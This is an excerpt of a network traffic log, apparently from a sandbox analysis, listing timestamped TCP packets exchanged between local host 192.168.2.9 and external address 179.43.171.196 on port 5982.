                                                                                                                                                              Nov 21, 2024 11:27:08.792349100 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.792484045 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.792495966 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.792537928 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.793325901 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.793339968 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.793387890 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.794024944 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.794037104 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.794090986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.794831038 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.794842958 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.794902086 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.795638084 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.795687914 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.795788050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.796417952 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.796544075 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.943631887 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.943780899 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.943850040 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.944042921 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.944152117 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.945163965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.945228100 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.945400953 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.945449114 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.946913958 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.947160006 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.948031902 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.948095083 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.948193073 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.948244095 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.948470116 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.948484898 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.948522091 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.948812962 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.948868990 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.949680090 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.949723005 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.949733019 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.949765921 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.950130939 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.950181961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.950726032 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.950778008 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.950808048 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.950859070 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.951493025 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.951653957 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.951704979 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.952644110 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.952723026 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.952770948 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.953202009 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.953310013 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.953759909 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.953818083 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.953917980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.953965902 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.954346895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.954406977 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.954461098 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.955007076 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.955121994 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.955235004 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.956064939 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.956162930 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.956221104 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.957035065 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.957093000 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.957600117 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.957659960 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.957674026 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.957715988 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.958376884 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.958504915 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.959263086 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.959470987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.959595919 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.960083008 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.960135937 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.960212946 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.960261106 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.960944891 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.961072922 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.961822033 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.961909056 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.961941004 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.961992025 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.962698936 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.962903023 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.963435888 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.963498116 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.963607073 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.964421034 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.964485884 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.964550972 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.964595079 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.965322018 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.965442896 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.966087103 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.966172934 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.966207981 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.966258049 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.966944933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.967053890 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.967119932 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.967803001 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.967916965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.968697071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.968761921 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.968775034 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.968832016 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.969537020 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.969671965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.970401049 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.970463037 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.970547915 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.970593929 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.971271992 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.971335888 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.971395969 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.972110987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.972202063 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.972932100 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.972995043 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.973073959 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.973123074 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.973799944 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.973912954 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.974682093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.974733114 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.974762917 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.974812031 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.975531101 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.975657940 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.975714922 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.976546049 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.976674080 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.977426052 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.977484941 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.977495909 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.977541924 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.978097916 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.978210926 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.978980064 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.979034901 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.979104996 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.979150057 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.979835987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.980056047 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.980128050 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.980709076 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.980811119 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.981048107 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.981554985 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.981653929 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.981699944 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.982400894 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.982522011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.982573986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.983247995 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.983381987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.983431101 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.984111071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.984219074 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.984270096 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.984970093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.985074997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.985126019 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.985841036 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.985941887 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.985990047 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.986712933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.986862898 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.986967087 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.987533092 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.032260895 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.136459112 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.136518955 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.136663914 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.136981010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.137079954 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.137130022 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.137828112 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.137959003 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.138006926 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.138643980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.138679981 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.138741970 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.139487982 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.139615059 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.139662981 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.140369892 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.140448093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.140846968 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.141230106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.141371012 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.141422987 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.141741991 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.141881943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.141931057 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.142625093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.142735004 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.142797947 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.144066095 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.144386053 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.144464016 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.145116091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.145181894 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.145231962 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.145750046 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.145977974 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.146029949 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.146502018 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.146570921 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.147093058 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.147308111 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.147448063 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.147494078 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.148116112 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.148231030 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.148282051 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.148832083 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.148922920 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.148972988 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.149895906 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.149939060 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.149985075 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.150635958 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.150794029 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.150849104 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.151321888 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.151345015 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.151412010 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.152225971 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.152338028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.152805090 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.152901888 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.152977943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.153031111 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.153783083 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.153856993 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.153908014 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.154658079 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.154709101 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.154757977 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.155441046 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.155571938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.155618906 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.156332016 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.156413078 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.156462908 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.157193899 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.157362938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.157524109 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.158108950 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.158194065 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.158240080 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.159079075 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.159224033 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.159272909 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.159781933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.159888029 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.159935951 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.160617113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.160657883 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.160702944 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.161501884 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.161600113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.161649942 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.162406921 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.162488937 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.162569046 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.163220882 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.163271904 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.163821936 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.164056063 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.164274931 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.164324999 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.164932013 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.165014982 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.165062904 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.165750980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.165885925 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.165993929 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.166640043 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.166691065 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.166738033 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.167538881 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.167608976 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.167658091 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.168414116 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.168469906 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.168947935 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.168998003 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:09.288368940 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:09.288420916 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:23.626878023 CET497335982192.168.2.9179.43.171.196
